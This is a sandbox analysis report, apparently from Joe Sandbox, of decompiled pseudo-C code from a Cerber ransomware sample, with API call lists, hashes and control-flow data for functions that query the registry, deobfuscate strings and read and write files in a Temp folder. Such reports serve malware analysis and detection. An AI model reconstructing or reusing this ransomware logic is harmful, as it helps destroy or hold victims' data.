                                                                                                                                                                                        						_t223 = _t77;
                                                                                                                                                                                        						if(_t77 == 0) {
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L34;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t78 = E00405905(0x40d7b8, 5, 0xbfa95e66);
                                                                                                                                                                                        					_t195 =  &(_t190[3]);
                                                                                                                                                                                        					_t80 = E004031AF(_t186, _t209, _t78);
                                                                                                                                                                                        					_t135 = _t80;
                                                                                                                                                                                        					_pop(_t149);
                                                                                                                                                                                        					if(_t80 == 0) {
                                                                                                                                                                                        						L17:
                                                                                                                                                                                        						_t81 = E00405905( &E0040D814, 7, 0x79d16581);
                                                                                                                                                                                        						_t196 =  &(_t195[3]);
                                                                                                                                                                                        						_t83 = E004031AF(_t186, _t213, _t81);
                                                                                                                                                                                        						_pop(_t150);
                                                                                                                                                                                        						if(_t83 == 0) {
                                                                                                                                                                                        							L25:
                                                                                                                                                                                        							_t84 = E00405905(0x40d824, 0xa, 0xd9c16e9a);
                                                                                                                                                                                        							_t190 =  &(_t196[3]);
                                                                                                                                                                                        							_t86 = E004031AF(_t186, _t216, _t84);
                                                                                                                                                                                        							_pop(_t151);
                                                                                                                                                                                        							if(_t86 != 0) {
                                                                                                                                                                                        								_t154 = E00409518(_t151, _t86, 1);
                                                                                                                                                                                        								 *0x42fa60 = _t154;
                                                                                                                                                                                        								if(_t154 != 0) {
                                                                                                                                                                                        									_t175 = _t154[2];
                                                                                                                                                                                        									_t90 = E004053CA(4 +  *_t154 * 4, _t154, _t154[2]);
                                                                                                                                                                                        									_t155 =  *0x42fa60; // 0x63d0f28
                                                                                                                                                                                        									_t155[2] = _t90;
                                                                                                                                                                                        									_t219 = _t90;
                                                                                                                                                                                        									if(_t90 == 0) {
                                                                                                                                                                                        										 *_t155 =  *_t155 & 0x00000000;
                                                                                                                                                                                        										__eflags =  *_t155;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_push("955c");
                                                                                                                                                                                        										_t93 = wsprintfW( &_v64, E0040591C(0x40d830, 3, 0x26e76e6e));
                                                                                                                                                                                        										_t190 =  &(_t190[6]);
                                                                                                                                                                                        										CharLowerBuffW( &_v56, _t93);
                                                                                                                                                                                        										_t97 = E00408E00(_t155,  &_v56);
                                                                                                                                                                                        										_t157 =  *0x42fa60; // 0x63d0f28
                                                                                                                                                                                        										_t45 =  &(_t157[2]); // 0x63cd4f0
                                                                                                                                                                                        										 *((intOrPtr*)( *_t45 +  *_t157 * 4)) = _t97;
                                                                                                                                                                                        										 *_t157 =  *_t157 + 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L30;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t160 = E00409518(_t150, _t83, 2);
                                                                                                                                                                                        						 *0x42faec = _t160;
                                                                                                                                                                                        						if(_t160 == 0) {
                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t175 = _t160[2];
                                                                                                                                                                                        						_t102 = E004053CA( *_t160 +  *0x42fad0 << 2, _t160, _t160[2]);
                                                                                                                                                                                        						_t161 =  *0x42faec; // 0x63d11a8
                                                                                                                                                                                        						_t181 = 0;
                                                                                                                                                                                        						_t161[2] = _t102;
                                                                                                                                                                                        						_t216 = _t102;
                                                                                                                                                                                        						if(_t102 != 0) {
                                                                                                                                                                                        							__eflags =  *0x42fad0 - _t181; // 0x4
                                                                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L22;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								L22:
                                                                                                                                                                                        								_t103 =  *0x42facc; // 0x63c0ad0
                                                                                                                                                                                        								_push( *((intOrPtr*)(_t103 + _t181 * 4)));
                                                                                                                                                                                        								_push(E0040591C( &E0040D81C, 4, 0x65dbde8b));
                                                                                                                                                                                        								_t105 =  *0x42faec; // 0x63d11a8
                                                                                                                                                                                        								_t32 =  &(_t105[2]); // 0x63c9d00
                                                                                                                                                                                        								_push( *_t32 +  *_t105 * 4); // executed
                                                                                                                                                                                        								E00405B0C(_t135,  *_t105, _t175, _t181, __eflags);
                                                                                                                                                                                        								_t109 =  *0x42faec; // 0x63d11a8
                                                                                                                                                                                        								_t163 =  *_t109;
                                                                                                                                                                                        								_t35 =  &(_t109[2]); // 0x63c9d00
                                                                                                                                                                                        								_t174 =  *_t35;
                                                                                                                                                                                        								_t196 =  &(_t196[6]);
                                                                                                                                                                                        								__eflags =  *(_t174 + _t163 * 4);
                                                                                                                                                                                        								if( *(_t174 + _t163 * 4) != 0) {
                                                                                                                                                                                        									_t164 = _t163 + 1;
                                                                                                                                                                                        									__eflags = _t164;
                                                                                                                                                                                        									 *_t109 = _t164;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t181 = _t181 + 1;
                                                                                                                                                                                        								__eflags = _t181 -  *0x42fad0; // 0x4
                                                                                                                                                                                        							} while (__eflags < 0);
                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *_t161 = 0;
                                                                                                                                                                                        						goto L25;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t175 = 0;
                                                                                                                                                                                        					_t211 =  *0x42fac4 - _t175; // 0x2
                                                                                                                                                                                        					if(_t211 <= 0) {
                                                                                                                                                                                        						L16:
                                                                                                                                                                                        						 *0x42fa5c = E00409518(_t149, _t135, 0);
                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L13;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						L13:
                                                                                                                                                                                        						_t111 =  *0x42fa70; // 0x63d2a50
                                                                                                                                                                                        						_t114 = E0040562B(0,  *((intOrPtr*)( *((intOrPtr*)(_t111 + _t175 * 4)))));
                                                                                                                                                                                        						_t182 = _t114;
                                                                                                                                                                                        						_pop(_t149);
                                                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                                                        							E00402FF6(_t149, _t182);
                                                                                                                                                                                        							_pop(_t149);
                                                                                                                                                                                        							E00403144(_t149);
                                                                                                                                                                                        							E00405463(_t182);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t175 = _t175 + 1;
                                                                                                                                                                                        						_t213 = _t175 -  *0x42fac4; // 0x2
                                                                                                                                                                                        					} while (_t213 < 0);
                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t118 = E00405905(0x40d7b8, 5, 0xbfa95e66);
                                                                                                                                                                                        				_t189 =  &(_t189[3]);
                                                                                                                                                                                        				_t120 = E004031AF(_t177, _t200, _t118);
                                                                                                                                                                                        				_pop(_t167);
                                                                                                                                                                                        				_v76 = _t120;
                                                                                                                                                                                        				_t201 = _t120;
                                                                                                                                                                                        				if(_t120 == 0) {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					E00409857(_t167, _t208); // executed
                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t122 = E00403156(_t120, _t201);
                                                                                                                                                                                        				_v80 = _v80 & 0x00000000;
                                                                                                                                                                                        				_v68 = _t122;
                                                                                                                                                                                        				_t202 = _t122;
                                                                                                                                                                                        				if(_t122 == 0) {
                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					_t123 = E0040317B(_v76, _t202, _v80);
                                                                                                                                                                                        					_t185 = _t123;
                                                                                                                                                                                        					_pop(_t167);
                                                                                                                                                                                        					_t203 = _t123;
                                                                                                                                                                                        					if(_t123 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t125 = E00403156(_t185, _t203);
                                                                                                                                                                                        					_v84 = _v84 & 0x00000000;
                                                                                                                                                                                        					_v72 = _t125;
                                                                                                                                                                                        					_t204 = _t125;
                                                                                                                                                                                        					if(_t125 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						L5:
                                                                                                                                                                                        						_t187 = E00402FED(_t167);
                                                                                                                                                                                        						E0040317B(_t185, _t204, _v84);
                                                                                                                                                                                        						_pop(_t168);
                                                                                                                                                                                        						E0040314D(_t168);
                                                                                                                                                                                        						_t137 = E00409518(_t168, _t126, 1);
                                                                                                                                                                                        						_pop(_t170);
                                                                                                                                                                                        						if(_t137 != 0) {
                                                                                                                                                                                        							_t132 =  *0x42fa78; // 0x1ed
                                                                                                                                                                                        							_t175 =  *0x42fa7c; // 0x63d4610
                                                                                                                                                                                        							_t134 = E004053CA(4 + _t132 * 4, _t170, _t175);
                                                                                                                                                                                        							_t171 =  *0x42fa78; // 0x1ed
                                                                                                                                                                                        							 *0x42fa78 =  *0x42fa78 + 1;
                                                                                                                                                                                        							_t206 =  *0x42fa78;
                                                                                                                                                                                        							 *0x42fa7c = _t134;
                                                                                                                                                                                        							 *((intOrPtr*)(_t134 + _t171 * 4)) = _t137;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00403085(_t206, _t187);
                                                                                                                                                                                        						_v84 = _v84 + 1;
                                                                                                                                                                                        						_pop(_t167);
                                                                                                                                                                                        					} while (_v84 < _v72);
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					_v80 = _v80 + 1;
                                                                                                                                                                                        					_t208 = _v80 - _v68;
                                                                                                                                                                                        				} while (_v80 < _v68);
                                                                                                                                                                                        				goto L9;
                                                                                                                                                                                        			}















































































                                                                                                                                                                                        0x00409e44
                                                                                                                                                                                        0x00409e45
                                                                                                                                                                                        0x00409e45
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409e1b
                                                                                                                                                                                        0x00409ce1
                                                                                                                                                                                        0x00409ce6
                                                                                                                                                                                        0x00409cec
                                                                                                                                                                                        0x00409cf1
                                                                                                                                                                                        0x00409cf2
                                                                                                                                                                                        0x00409cf6
                                                                                                                                                                                        0x00409cf8
                                                                                                                                                                                        0x00409db6
                                                                                                                                                                                        0x00409db6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409db6
                                                                                                                                                                                        0x00409d00
                                                                                                                                                                                        0x00409d05
                                                                                                                                                                                        0x00409d0a
                                                                                                                                                                                        0x00409d0e
                                                                                                                                                                                        0x00409d10
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409d16
                                                                                                                                                                                        0x00409d16
                                                                                                                                                                                        0x00409d1e
                                                                                                                                                                                        0x00409d23
                                                                                                                                                                                        0x00409d25
                                                                                                                                                                                        0x00409d26
                                                                                                                                                                                        0x00409d28
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409d2a
                                                                                                                                                                                        0x00409d2f
                                                                                                                                                                                        0x00409d34
                                                                                                                                                                                        0x00409d38
                                                                                                                                                                                        0x00409d3a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00409d3c
                                                                                                                                                                                        0x00409d3c
                                                                                                                                                                                        0x00409d45
                                                                                                                                                                                        0x00409d47
                                                                                                                                                                                        0x00409d4c
                                                                                                                                                                                        0x00409d4f
                                                                                                                                                                                        0x00409d5c
                                                                                                                                                                                        0x00409d5f
                                                                                                                                                                                        0x00409d62
                                                                                                                                                                                        0x00409d64
                                                                                                                                                                                        0x00409d69
                                                                                                                                                                                        0x00409d76
                                                                                                                                                                                        0x00409d7b
                                                                                                                                                                                        0x00409d81
                                                                                                                                                                                        0x00409d81
                                                                                                                                                                                        0x00409d87
                                                                                                                                                                                        0x00409d8c
                                                                                                                                                                                        0x00409d8c
                                                                                                                                                                                        0x00409d90
                                                                                                                                                                                        0x00409d95
                                                                                                                                                                                        0x00409d9d
                                                                                                                                                                                        0x00409d9e
                                                                                                                                                                                        0x00409da4
                                                                                                                                                                                        0x00409da4
                                                                                                                                                                                        0x00409dac
                                                                                                                                                                                        0x00409dac
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0042FAD4), ref: 00409C9A
                                                                                                                                                                                          • Part of subcall function 0040692E: RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
                                                                                                                                                                                          • Part of subcall function 0040692E: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
                                                                                                                                                                                          • Part of subcall function 0040692E: RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9
                                                                                                                                                                                          • Part of subcall function 0040692E: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                        • wsprintfW.USER32 ref: 00409F8C
                                                                                                                                                                                        • CharLowerBuffW.USER32(?,00000000), ref: 00409F9B
                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000016,00000000,0042FA80,0040FC68,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040A08B
                                                                                                                                                                                          • Part of subcall function 00409518: CharLowerBuffW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004095C7
                                                                                                                                                                                          • Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
                                                                                                                                                                                          • Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BuffCharErrorLastLower$CloseCreateCriticalEnumInfoInitializeKnownOpenQuerySectionWelllstrcmpiwsprintf
                                                                                                                                                                                        • String ID: 955c
                                                                                                                                                                                        • API String ID: 2837586674-4165844248
                                                                                                                                                                                        • Opcode ID: 74e4fe0b5d240772b4d3d9403435ba4b1cb7b1d43f077e24a63fdc264ba793d4
                                                                                                                                                                                        • Instruction ID: f53d3d57d72d2fba058dee37206852e67e00b2b4db81be835a0203e8b915a40b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 74e4fe0b5d240772b4d3d9403435ba4b1cb7b1d43f077e24a63fdc264ba793d4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7EA1B272A447069FD620BF65EC42F1B37A8AB44714F51043FF808BB2D3DA799D058A9D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 670 4025e6-40261d call 40591c call 405b0c 675 402697-40269c 670->675 676 40261f-40263b CreateFileW 670->676 677 40263d-40264c GetFileSize 676->677 678 40268e-402696 call 405463 676->678 679 402650-40265c call 4053bd 677->679 680 40264e 677->680 678->675 685 402685-402688 CloseHandle 679->685 686 40265e-402670 ReadFile 679->686 680->679 685->678 687 402672-402675 686->687 688 40267c-402683 call 405463 686->688 687->688 689 402677-40267a 687->689 688->685 689->685
                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E004025E6(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, long* _a8) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				long* _t20;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				_push("C:\Users\engineer\AppData\Local\Temp\d06ed635");
                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                        				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
                                                                                                                                                                                        				_push( &_v12);
                                                                                                                                                                                        				if(E00405B0C(0, __ecx, 0, __esi, __eflags) != 0) {
                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                        					_t17 = CreateFileW(_v12, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                                                        					_v8 = _t17;
                                                                                                                                                                                        					if(_t17 != 0xffffffff) {
                                                                                                                                                                                        						_t33 = GetFileSize(_t17, 0);
                                                                                                                                                                                        						_t20 = _a8;
                                                                                                                                                                                        						if(_t20 != 0) {
                                                                                                                                                                                        							 *_t20 = _t33;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t28 = E004053BD(_t27);
                                                                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                                                                        							if(ReadFile(_v8, _t28, _t33,  &_v16, 0) == 0 || _t33 != _v16) {
                                                                                                                                                                                        								E00405463(_t28);
                                                                                                                                                                                        								_t28 = 0;
                                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								 *((char*)(_t28 + _t33)) = 0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t28;
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0040D17C,?,?,?,?,?,?,?,00000000), ref: 0040262F
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 0040263F
                                                                                                                                                                                        • ReadFile.KERNEL32(004029D6,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000), ref: 00402668
                                                                                                                                                                                        • CloseHandle.KERNEL32(004029D6,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00402688
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\d06ed635, xrefs: 004025F3
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$ErrorLast$CloseCreateFreeHandleHeapReadSize
                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\d06ed635
                                                                                                                                                                                        • API String ID: 1761772567-561343493
                                                                                                                                                                                        • Opcode ID: e5f67ced36fef974d76bb1cef8f14bd84dfa63e88f18fd2ba140fa135439d158
                                                                                                                                                                                        • Instruction ID: bd1e91014a81025413ce5f3561b387066ac48bd53aee3230f565365039a3e6e7
                                                                                                                                                                                        • Opcode Fuzzy Hash: e5f67ced36fef974d76bb1cef8f14bd84dfa63e88f18fd2ba140fa135439d158
                                                                                                                                                                                        • Instruction Fuzzy Hash: F31159B2900108BFDB206B65DD89EAF3B7CDB84354F110976F810F31D0EB769E048A98
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                        			E00402522(void* __ecx, long __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                        				int _t16;
                                                                                                                                                                                        				long _t20;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t31 = __eflags;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				E00404CDC();
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				_t20 = 0;
                                                                                                                                                                                        				_push("C:\Users\engineer\AppData\Local\Temp\d06ed635");
                                                                                                                                                                                        				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
                                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                                        				if(E00405B0C(0, __ecx, __edi, __esi, _t31) != 0) {
                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                        					_t13 = CreateFileW(_v8, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                                                                                                                                        					_t25 = _t13;
                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                        						_t16 = WriteFile(_t25, _a8, __edi,  &_v12, 0); // executed
                                                                                                                                                                                        						if(_t16 != 0 && __edi == _v12) {
                                                                                                                                                                                        							_t20 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						FlushFileBuffers(_t25);
                                                                                                                                                                                        						CloseHandle(_t25);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t20;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000), ref: 00404CE8
                                                                                                                                                                                          • Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
                                                                                                                                                                                          • Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040256C
                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402583
                                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402595
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 0040259C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\d06ed635, xrefs: 00402532
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Create$AttributesBuffersCloseDirectoryFlushHandlePathRootSkipWrite
                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\d06ed635
                                                                                                                                                                                        • API String ID: 1235120676-561343493
                                                                                                                                                                                        • Opcode ID: 16bafffdd5c7809d266f610f9f123d127a81daecef8baa3c0d04b187e507f448
                                                                                                                                                                                        • Instruction ID: 1381f6fc85793e5c8f5f04911c0c0407d55afb8d8fa61240edf39063a8e535f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 16bafffdd5c7809d266f610f9f123d127a81daecef8baa3c0d04b187e507f448
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE01D4B55411187FEB206BA5DD8BEDF3B2CDF04354F100576F901B21D1E6B99E058AAC
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                        			E0040A6C5(void* __ecx, void* __eflags, char* _a4) {
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                        				char _v23;
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                                        				intOrPtr* _t50;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				char* _t72;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                        
                                                                                                                                                                                        				E00405F6B(__ecx, __eflags,  &_v28);
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosw");
                                                                                                                                                                                        				asm("stosb");
                                                                                                                                                                                        				_t72 = _a4;
                                                                                                                                                                                        				_t66 = _t70;
                                                                                                                                                                                        				_v24 =  *_t72;
                                                                                                                                                                                        				CharLowerBuffW( *(_t72 + 8), lstrlenW( *(_t72 + 8)));
                                                                                                                                                                                        				_t75 = E0040A367;
                                                                                                                                                                                        				_t62 = 0;
                                                                                                                                                                                        				E0040A419(_t66, 0,  *(_t72 + 8), E0040A367,  &_v24); // executed
                                                                                                                                                                                        				_t83 = (_t80 & 0xfffffff8) - 0x1c + 0x10;
                                                                                                                                                                                        				if( *_t72 != 0) {
                                                                                                                                                                                        					_t55 =  *0x42fa74; // 0x63d15e0
                                                                                                                                                                                        					_v23 = 1;
                                                                                                                                                                                        					if(_t55 != 0 &&  *_t55 > 0) {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t10 = _t55 + 8; // 0x63cb1f0
                                                                                                                                                                                        							_t66 =  &_v24;
                                                                                                                                                                                        							E0040A419( &_v24, 0,  *((intOrPtr*)( *_t10 + _t62 * 4)), E0040A367,  &_v24);
                                                                                                                                                                                        							_t55 =  *0x42fa74; // 0x63d15e0
                                                                                                                                                                                        							_t83 = _t83 + 0x10;
                                                                                                                                                                                        							_t62 = _t62 + 1;
                                                                                                                                                                                        						} while (_t62 <  *_t55);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t64 = 0;
                                                                                                                                                                                        					_t89 =  *0x42fad0 - _t64; // 0x4
                                                                                                                                                                                        					if(_t89 > 0) {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t57 =  *0x42facc; // 0x63c0ad0
                                                                                                                                                                                        							E0040A419(_t66, 0,  *((intOrPtr*)(_t57 + _t64 * 4)), _t75,  &_v24); // executed
                                                                                                                                                                                        							_t83 = _t83 + 0x10;
                                                                                                                                                                                        							_t64 = _t64 + 1;
                                                                                                                                                                                        							_t90 = _t64 -  *0x42fad0; // 0x4
                                                                                                                                                                                        						} while (_t90 < 0);
                                                                                                                                                                                        					}
